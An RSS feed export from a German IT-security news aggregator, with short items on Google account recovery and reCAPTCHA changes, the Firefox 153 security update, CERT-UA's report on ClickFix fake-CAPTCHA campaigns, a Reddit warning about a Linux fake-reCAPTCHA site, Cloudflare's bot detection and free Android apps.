<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=recaptcha+qrcode+googlepflicht%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 21:25:29 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 21:25:29 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=recaptcha+qrcode+googlepflicht%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=recaptcha+qrcode+googlepflicht%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Google führt Video-Selfie für Kontowiederherstellung ein]]></title>
<description><![CDATA[Google ergänzt die Wiederherstellung von Konten um ein Video-Selfie. Zudem nutzt Google Cloud Gestenerkennung für reCAPTCHA-Tests zur Bot-Abwehr.

Tags: #Cyber Security | #Google]]></description>
<link>https://tsecurity.de/de/3690858/it-security-nachrichten/google-fuehrt-video-selfie-fuer-kontowiederherstellung-ein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690858/it-security-nachrichten/google-fuehrt-video-selfie-fuer-kontowiederherstellung-ein/</guid>
<pubDate>Fri, 24 Jul 2026 08:58:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2022/08/Gesichtserkennung-Shutterstock-2007173216-1920.jpg" class="attachment-full size-full wp-post-image" alt="Gesichtserkennung" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2022/08/Gesichtserkennung-Shutterstock-2007173216-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2022/08/Gesichtserkennung-Shutterstock-2007173216-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2022/08/Gesichtserkennung-Shutterstock-2007173216-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2022/08/Gesichtserkennung-Shutterstock-2007173216-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2022/08/Gesichtserkennung-Shutterstock-2007173216-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Google führt Video-Selfie für Kontowiederherstellung ein 1"></p>
    Google ergänzt die Wiederherstellung von Konten um ein Video-Selfie. Zudem nutzt Google Cloud Gestenerkennung für reCAPTCHA-Tests zur Bot-Abwehr.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-security">#Cyber Security</a> | <a href="https://www.it-daily.net/thema/google">#Google</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 153.0 behebt über 60 Schwachstellen und erstellt QR-Codes]]></title>
<description><![CDATA[Die neue Firefox-Version 153 für Windows, macOS, Linux und Android bringt einige Verbesserungen bei der Benutzung wie etwa HDR-Videowiedergabe, abgeschottete Tab-Umgebungen, und QR-Code-Erzeugung zur Link-Weitergabe. Die Entwickler haben mehr als 60 Sicherheitslücken gestopft. Updates gibt es auc...]]></description>
<link>https://tsecurity.de/de/3685544/it-nachrichten/firefox-1530-behebt-ueber-60-schwachstellen-und-erstellt-qr-codes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685544/it-nachrichten/firefox-1530-behebt-ueber-60-schwachstellen-und-erstellt-qr-codes/</guid>
<pubDate>Wed, 22 Jul 2026 09:51:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die neue Firefox-Version 153 für Windows, macOS, Linux und Android bringt einige Verbesserungen bei der Benutzung wie etwa HDR-Videowiedergabe, abgeschottete Tab-Umgebungen, und QR-Code-Erzeugung zur Link-Weitergabe. Die Entwickler haben mehr als 60 Sicherheitslücken gestopft. Updates gibt es auch für die ESR-Versionen.</p>



<p>Im <a href="https://www.mozilla.org/en-US/security/advisories/mfsa2026-68/" target="_blank" rel="noreferrer noopener">Sicherheitsbericht für Firefox 153</a> nennt Mozilla mehr als 63 beseitigte Sicherheitslücken, von denen 60 durch externe Sicherheitsforscher entdeckt und gemeldet wurden, drei davon durch OpenAI Codex Security. Mozilla stuft 17 dieser Schwachstellen als hohes Risiko ein. Bei vier dieser Lücken drohen Ausbrüche aus der Browser-Sandbox.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Weitere 35 Schwachstellen sind als mittleres Risiko ausgewiesen, der Rest als geringes Risiko. Die drei letzten Einträge im Sicherheitsbericht fassen eine nicht angegebene Zahl intern gefundener, als hohes Risiko eingestufter Sicherheitslücken zusammen, die aus Programmierfehlern bei der Speicherverwaltung resultieren. Die Lücken sind danach gruppiert, welche Programme und Programmversionen betroffen sind.</p>



<h2 class="wp-block-heading toc">Was ist neu in Firefox 153?</h2>



<p>Für Windows-Nutzer bietet Firefox 153 die Wiedergabe von HDR-Videos (High Dynamic Range). Voraussetzung ist, dass der HDR-Modus in den Windows Bildschirmeinstellungen aktiviert ist. Notebook-Displays, die lediglich „HDR Video-Streaming“ bieten, werden derzeit nicht unterstützt, ebenso wie Smartphone-Videos im Hochkant-Format.</p>



<p>Mit dem integrierten PDF-Betrachter und -Editor können Sie nun mehrere PDF-Dateien zusammenführen, indem Sie sie in die PDF-Sidebar ziehen. Auch können Sie jetzt Bilder als neue Seiten in PDF-Dokumente einfügen.</p>



<p>Wenn Sie einen Link weitergeben wollen, etwa auch an Ihr eigenes Smartphone, ohne einen Web-Dienst (wie Firefox Sync) zu benutzen, können Sie mit Firefox 153 einen QR-Code erstellen. Firefox hebt nun das Symbol für die Standort-Freigabe in roter Farbe hervor, wenn eine Website Zugriff auf Ihren Standort hat.</p>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a6076312fb5f"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/ffx153-qrcode.webp" alt="Firefox 153 erstellt QR-Codes" class="wp-image-3196298" width="1024" height="576" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><em>Link mittels QR-Code teilen</em></figcaption></figure><p class="imageCredit">fz</p></div>



<p>Das mit Firefox 149 eingeführte und in Firefox integrierte Gratis-VPN bietet weiterhin eine vorübergehend (bis Ende August) auf 28 Länder erweiterte Auswahl virtueller Standorte mit uneingeschränktem Datenvolumen. Das kostenlose VPN ist derzeit für Firefox-Nutzer in den USA, Kanada, Großbritannien, Frankreich und Deutschland verfügbar.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Weitere Browser-Updates</h2>



<p>Neben <a title="Download" href="https://www.pcwelt.de/article/1082606/firefox-50.html" data-type="link" data-id="https://www.pcwelt.de/article/1082606/firefox-50.html" target="_blank" rel="noreferrer noopener">Firefox 153.0</a> sind auch die ESR-Ausgaben 140.13.0 und 115.38.0 erhältlich. Letztere gibt es allerdings nur für Windows 7 &amp; 8.1 sowie macOS 10.12 bis 10.14. In den ESR-Versionen haben Mozillas Entwickler diejenigen der oben genannten Schwachstellen behoben, die schon im teils gut abgehangenen Code dieser Browser-Generationen stecken. Das sind in Firefox 140.13 mindestens 32 und in Firefox 115.38 immerhin noch wenigstens 14 geschlossene Sicherheitslücken. Darunter sind zwei als kritisch eingestufte Schwachstellen, die <a href="https://www.pcwelt.de/article/3167428/firefox-152-fuer-windows-mac-linux-mehr-sicherheit-neuer-look.html" target="_blank" rel="noreferrer noopener">bereits in Firefox 152.0.6 beseitigt</a> wurden. Firefox 153 ist außerdem die Basis für die nächste ESR-Generation. Das bedeutet, Firefox ESR 140 wird im Oktober durch Firefox ESR 153 abgelöst.</p>



<h2 class="wp-block-heading toc">Gnadenfrist für Windows 7 &amp; 8 erneut verlängert</h2>



<p>Firefox ESR 115 wird vorerst bis März 2027 (v115.52) weiter <a href="https://support.mozilla.org/de/kb/firefox-nutzer-win-7-8-81-umstellung-firefox-esre" target="_blank" rel="noreferrer noopener">mit Sicherheits-Updates gepflegt</a>. Wenn Sie Firefox 115 unter Windows 7, 8.1 oder macOS 10.12 bis 10.14 einsetzen, erhalten Sie zumindest für den Browser weiterhin aktuelle Sicherheits-Updates. Rechtzeitig vor Ablauf dieser Gnadenfrist wird Mozilla die Situation neu bewerten und dann entscheiden, ob es eine weitere Verlängerung gibt.</p>



<h2 class="wp-block-heading toc">Updates für Tor Browser und Thunderbird</h2>



<p>Der neueste <a href="https://www.pcwelt.de/article/1105413/anonymisierungs-programm-tor.html" target="_blank" rel="noreferrer noopener" title="Download">Tor Browser</a> 15.0.19 basiert auf Firefox ESR 140.13. Das ansonsten von Mozilla unabhängige Tor-Projekt und die Nutzer des Tor Browsers profitieren so von den in Firefox gestopften Sicherheitslücken. Tor Browser 15.0.9 bringt die Erweiterung NoScript 13.6.31 mit. Das Tor Projekt hostet NoScript für seinen Browser inzwischen selbst. Erkennbar ist das daran, dass diese NoScript-Version den Suffix „.1984“ (aktuell also 13.6.31.1984) trägt – George Orwell lässt grüßen. Ansonsten ist sie identisch mit der Version auf AMO (addons.mozilla.org). Einen Tor Browser für ältere Systeme gibt es nicht mehr. Auch Mozillas Mailer <a href="https://www.pcwelt.de/article/1164952/email-client-thunderbird.html" data-type="link" data-id="https://www.pcwelt.de/article/1164952/email-client-thunderbird.html" target="_blank" rel="noreferrer noopener" title="Download">Thunderbird</a> 153.0 und 140.13.0esr sind verfügbar. Darin haben die Entwickler ebenfalls Dutzende Sicherheitslücken beseitigt, die das Mail-Programm vorwiegend von Firefox geerbt hat. </p>



<p>Bis zur Veröffentlichung der nächsten Hauptversion Firefox 154 am 18. August plant Mozilla wöchentliche Updates zur Fehlerbehebung und um weitere Schwachstellen zu beseitigen. Nach Firefox 154 wechselt Mozilla, wie auch Google Chrome und Microsoft Edge, auf einen <a href="https://www.pcwelt.de/article/3190234/bald-sollen-die-webbrowser-doppelt-so-oft-aktualisiert-werden.html" target="_blank" rel="noreferrer noopener">zweiwöchentlichen Turnus</a> für neue Hauptversionen. Firefox 155 soll demnach bereits am 1. September erscheinen.</p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix Attacks Drive UAC-0145 Cyber Campaigns, CERT-UA Warns]]></title>
<description><![CDATA[The ClickFix attacks technique has become a key initial access method for the UAC-0145 cyber threat cluster, according to a new report from Ukraine's Computer Emergency Response Team (CERT-UA). The agency said the threat group, also tracked as Sandworm, APT44, Seashell Blizzard, and a subcluster ...]]></description>
<link>https://tsecurity.de/de/3675937/it-security-nachrichten/clickfix-attacks-drive-uac-0145-cyber-campaigns-cert-ua-warns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675937/it-security-nachrichten/clickfix-attacks-drive-uac-0145-cyber-campaigns-cert-ua-warns/</guid>
<pubDate>Fri, 17 Jul 2026 13:54:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="ClickFix Attacks" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks.webp 1536w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks.webp 1536w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="ClickFix Attacks Drive UAC-0145 Cyber Campaigns, CERT-UA Warns 3"></p><p class="PDq2pG_selectionAnchorContainer" data-start="390" data-end="851">The ClickFix attacks technique has become a key initial access method for the UAC-0145 cyber threat cluster, according to a new report from Ukraine's Computer Emergency Response Team (<a href="https://thecyberexpress.com/cert-ua-warns-of-darkcrystal-rat/" target="_blank" rel="noopener">CERT-UA</a>). The agency said the threat group, also tracked as Sandworm, <a href="https://thecyberexpress.com/alleged-ddos-attack-on-denmark/" target="_blank" rel="noopener">APT44</a>, Seashell Blizzard, and a subcluster of UAC-0002, has shifted its tactics during 2026, increasingly relying on <a href="https://thecyberexpress.com/google-recaptcha-trojanized-by-russian-hackers/" target="_blank" rel="noopener">fake CAPTCHA prompts</a> and social engineering to compromise systems.</p>
<p data-start="853" data-end="1196">CERT-UA said it has worked with Ukrainian cybersecurity agencies for several years to investigate the activities of UAC-0145. While the group previously relied on infected software installers distributed through torrent websites, recent campaigns have increasingly used ClickFix to trick users into executing malicious PowerShell commands.</p>

<h3 data-section-id="4rdrqx" data-start="1198" data-end="1255"><strong><span role="text">ClickFix Attacks Emerging as Primary Initial Access Vector</span></strong></h3>
<p data-start="1257" data-end="1565"><a href="https://cert.gov.ua/article/6318437" target="_blank" rel="nofollow noopener">According to CERT-UA</a>, infections recorded during the spring and summer of 2026 frequently began when victims visited compromised websites displaying fake CAPTCHA pages. Users were instructed to copy and execute PowerShell commands in their terminal, a <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-phishing/" target="_blank" rel="noopener" title="phishing" data-wpil-keyword-link="linked" data-wpil-monitor-id="29024">phishing</a> technique commonly referred to as ClickFix.</p>
<p data-start="1567" data-end="1765">The downloaded commands were designed to retrieve malicious files such as GHETTOVIBE, a Visual Basic Script (VBS) that establishes persistence by placing itself in the Windows Startup directory.</p>
<p data-start="1767" data-end="2036">Once executed, attackers could deploy SCOUTCURL, a PowerShell reconnaissance tool capable of collecting information about the compromised system, including device specifications, installed software, browser <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29022">data</a>, and local files before exfiltrating the information.</p>
<p data-start="2038" data-end="2186">CERT-UA also observed <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-malware/" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="29017">malware</a> loaders including FLUIDLEECH, disguised as antivirus software, and LOADLOOP being used during these campaigns.</p>

<h3 data-section-id="1n2nqi8" data-start="2188" data-end="2241"><strong><span role="text">Backdoors and Data Theft Tools Widely Deployed</span></strong></h3>
<p data-start="2243" data-end="2395">The report noted that attackers continue using <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noopener" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="29025">malware</a> families such as KALAMBUR, SUMBUR, and TAMBUR after gaining access to victim systems.</p>
<p data-start="2397" data-end="2595">To maintain <a href="https://thecyberexpress.com/intellexa-remote-access-to-customer-systems/" target="_blank" rel="noopener">remote access</a>, the group relied on legitimate utilities including OpenSSH and Tor, forwarding local network ports such as 445, 3389, and 22 to attacker-controlled infrastructure.</p>
<p data-start="2597" data-end="2754">CERT-UA also found malware designed to steal messaging data from Signal and <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-to-do-if-and-when-your-whatsapp-is-hacked/" title="WhatsApp" data-wpil-keyword-link="linked" data-wpil-monitor-id="29019">WhatsApp</a>, with stolen information reportedly exfiltrated using RSYNC.</p>
<p data-start="2756" data-end="2993">On infected systems examined during <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29023">cyber</a> defense operations, investigators additionally identified FREAKYPOLL, a Python-based backdoor distributed as compiled bytecode (.pyc), providing attackers with persistent unauthorized access.</p>

<h2 data-section-id="1s2gyff" data-start="2995" data-end="3057"><span role="text"><strong data-start="2998" data-end="3057">Compromised Websites Used to Deliver Fake CAPTCHA Pages</strong></span></h2>
<p data-start="3059" data-end="3171">During June and July 2026, CERT-UA analyzed more than ten compromised websites involved in <strong data-start="3150" data-end="3170">ClickFix attacks</strong>.</p>
<p data-start="3173" data-end="3516">Investigators found attackers using both the <strong data-start="3218" data-end="3236">Cloaking.House</strong> service and custom malware called <strong data-start="3271" data-end="3283">SMARTAXE</strong> to dynamically modify legitimate webpages. SMARTAXE retrieves remote domains from blockchain smart contracts through Ethereum's <strong data-start="3412" data-end="3424">eth_call</strong> function before displaying fake CAPTCHA pages or redirecting visitors to malicious content.</p>
<p data-start="3518" data-end="3773">CERT-UA warned that any website used in these attacks should be considered compromised, potentially through vulnerable content management systems (CMS), stolen credentials, web shells, malicious plugins, modified website scripts, or server-side backdoors.</p>
<p data-start="3775" data-end="3908">The agency urged website administrators and hosting providers to strengthen website <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29018">security</a> and respond quickly to incident reports.</p>

<h3 data-section-id="xet64s" data-start="3910" data-end="3965"><span role="text"><strong data-start="3913" data-end="3965">Android Malware Also Part of UAC-0145 Operations</strong></span></h3>
<p data-start="3967" data-end="4069">The report also highlighted growing use of Android malware distributed through messaging applications.</p>
<p data-start="4071" data-end="4338">Attackers were observed sharing APK files disguised as security or antivirus tools. One such malware family, tracked as COWARDDUCK, functions as a full-featured Android backdoor capable of collecting device information, contacts, files, and real-time geolocation.</p>
<p data-start="4340" data-end="4527">The malware targets files from directories including DCIM, Documents, Downloads, Pictures, and Alarms while searching for formats such as DOCX, XLSX, PPTX, ZIP, RAR, JSON, and OVPN files.</p>
<p data-start="4529" data-end="4744">According to CERT-UA, COWARDDUCK uploads stolen files through the Dropbox API while receiving commands from legitimate services including Steam Community and StockMemory domains through proxy infrastructure.</p>

<h3 data-section-id="1o8fspw" data-start="4746" data-end="4801"><span role="text"><strong data-start="4749" data-end="4801">Microsoft Sees Global Rise in ClickFix Campaigns</strong></span></h3>
<p data-start="4803" data-end="5026">Microsoft Threat Intelligence and Microsoft Defender Experts also <a href="https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/" target="_blank" rel="nofollow noopener">reported</a> that ClickFix campaigns have increased significantly since early 2024, targeting thousands of enterprise and consumer devices globally each day.</p>
<p data-start="5028" data-end="5345">Microsoft said the technique commonly delivers malware such as Lumma <a class="wpil_keyword_link" href="https://cyble.com/stealer/" target="_blank" rel="noopener" title="Stealer" data-wpil-keyword-link="linked" data-wpil-monitor-id="29020">Stealer</a> by persuading users to copy and execute commands through Windows Run, Windows Terminal, or Windows PowerShell. The campaigns are often combined with phishing, malvertising, and drive-by compromise techniques that imitate trusted brands.</p>
<p data-start="5347" data-end="5605">Because ClickFix attacks rely on user interaction rather than exploiting software <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="29021">vulnerabilities</a> directly, Microsoft recommends organizations strengthen user awareness and apply security policies that restrict unnecessary use of command execution tools.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux specific malware website tries exploiti using terminal]]></title>
<description><![CDATA[This website faked a ReCaptcha and literally asks to open the terminal and paste a command. (see image). Very bold. Please keep in mind, always try your best to make new users aware of such dangers! - I reported it to Google Safe browsing just now, in case anyone wants to try and look at it or he...]]></description>
<link>https://tsecurity.de/de/3668945/linux-tipps/linux-specific-malware-website-tries-exploiti-using-terminal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668945/linux-tipps/linux-specific-malware-website-tries-exploiti-using-terminal/</guid>
<pubDate>Tue, 14 Jul 2026 21:02:50 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>This website faked a ReCaptcha and literally asks to open the terminal and paste a command. (see image). Very bold.</p> <p>Please keep in mind, always try your best to make new users aware of such dangers!</p> <p>- I reported it to Google Safe browsing just now, in case anyone wants to try and look at it or help by reporting it too, this is the link in a safe format, assemble it yourself at your risk: "emaliowe . pl".<br> - Possibly blocked by Firefox, since I don't have anything in my clipboard after opening the page.</p> <p><a href="https://preview.redd.it/worpsjifh8dh1.png?width=720&amp;format=png&amp;auto=webp&amp;s=f0c1254ed439508fda8f799e984ea78820e6378f">https://preview.redd.it/worpsjifh8dh1.png?width=720&amp;format=png&amp;auto=webp&amp;s=f0c1254ed439508fda8f799e984ea78820e6378f</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/ShatteredIcicle"> /u/ShatteredIcicle </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uwg73m/linux_specific_malware_website_tries_exploiti/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uwg73m/linux_specific_malware_website_tries_exploiti/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare: Überwachung der Nutzer ersetzt jetzt das CAPTCHA]]></title>
<description><![CDATA[Cloudflare führt ein neues System zur Bot-Erkennung ein, das klassische CAPTCHA-Abfragen ersetzen soll. Menschen sollen durch eine deutlich längere Beobachtung ihres Nutzungsverhaltens von automatisierten Systemen unterschieden werden.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3667054/it-security-nachrichten/cloudflare-ueberwachung-der-nutzer-ersetzt-jetzt-das-captcha/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667054/it-security-nachrichten/cloudflare-ueberwachung-der-nutzer-ersetzt-jetzt-das-captcha/</guid>
<pubDate>Tue, 14 Jul 2026 08:52:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159957.html"><img hspace="5" border="0" align="left" alt="Logo, Captcha, Recaptcha, Captchas, v3" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/57379.jpg"></a>
			<a href="https://winfuture.de/special/cloud/" title="Cloud Special">Cloudflare</a> führt ein neues System zur Bot-Erkennung ein, das klassische CAPTCHA-Abfragen ersetzen soll. Menschen sollen durch eine deutlich längere Beobachtung ihres Nutzungsverhaltens von automatisierten Systemen unterschieden werden.			(<a href="https://winfuture.de/news,159957.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Play Store Aktion: Diese 77 Android-Apps, Spiele, Icon Packs & Live Wallpaper gibt es heute Gratis]]></title>
<description><![CDATA[Am Sonntag hält der Google Play Store sehr viele temporär kostenlose Apps, Spiele, Icon Packs und Live Wallpaper bereit - schaut mal herein. Heute berichten wir über das neue Android-Backup und die Pixel Watch 5. Schaut euch auch die neuen Recaptcha mit Handgesten an und wir zeigen euch, wie ihr ...]]></description>
<link>https://tsecurity.de/de/3662949/it-nachrichten/google-play-store-aktion-diese-77-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662949/it-nachrichten/google-play-store-aktion-diese-77-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis/</guid>
<pubDate>Sun, 12 Jul 2026 10:02:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="480" src="https://www.googlewatchblog.de/wp-content/uploads/apps-11.07.2026-1024x768.jpg" class="attachment-large size-large wp-post-image" alt="apps 11.07.2026" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/apps-11.07.2026-1024x768.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.07.2026-300x225.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.07.2026-768x576.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.07.2026-533x400.jpg 533w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.07.2026-800x600.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.07.2026.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Am Sonntag hält der Google Play Store sehr viele temporär kostenlose Apps, Spiele, Icon Packs und Live Wallpaper bereit - schaut mal herein. Heute berichten wir über das <a href="https://www.googlewatchblog.de/2026/07/android-google-startet-flexibles-backup-fuer-alle-nutzer-so-koennt-ihr-apps-einzeln-auswaehlen-screenshots/"><strong>neue Android-Backup</strong></a> und die <a href="https://www.googlewatchblog.de/2026/07/pixel-watch-5-das-ist-googles-neue-smartwatch-alles-was-bisher-bekannt-ist-modelle-farben-preise-galerie/"><strong>Pixel Watch 5</strong></a>. Schaut euch auch die neuen <a href="https://www.googlewatchblog.de/2026/07/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-winken-statt-tippen-alle-infos/"><strong>Recaptcha mit Handgesten</strong></a> an und wir zeigen euch, wie ihr <a href="https://www.googlewatchblog.de/2026/07/mario-kart-bei-youtube-so-koennt-ihr-das-kultspiel-jetzt-im-player-spielen-techdemo-macht-es-moeglich-video/"><strong>Super Mario bei YouTube spielen</strong></a> könnt.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/google-play-store-aktion-diese-77-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis-4/">Google Play Store Aktion: Diese 77 Android-Apps, Spiele, Icon Packs &amp; Live Wallpaper gibt es heute Gratis</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
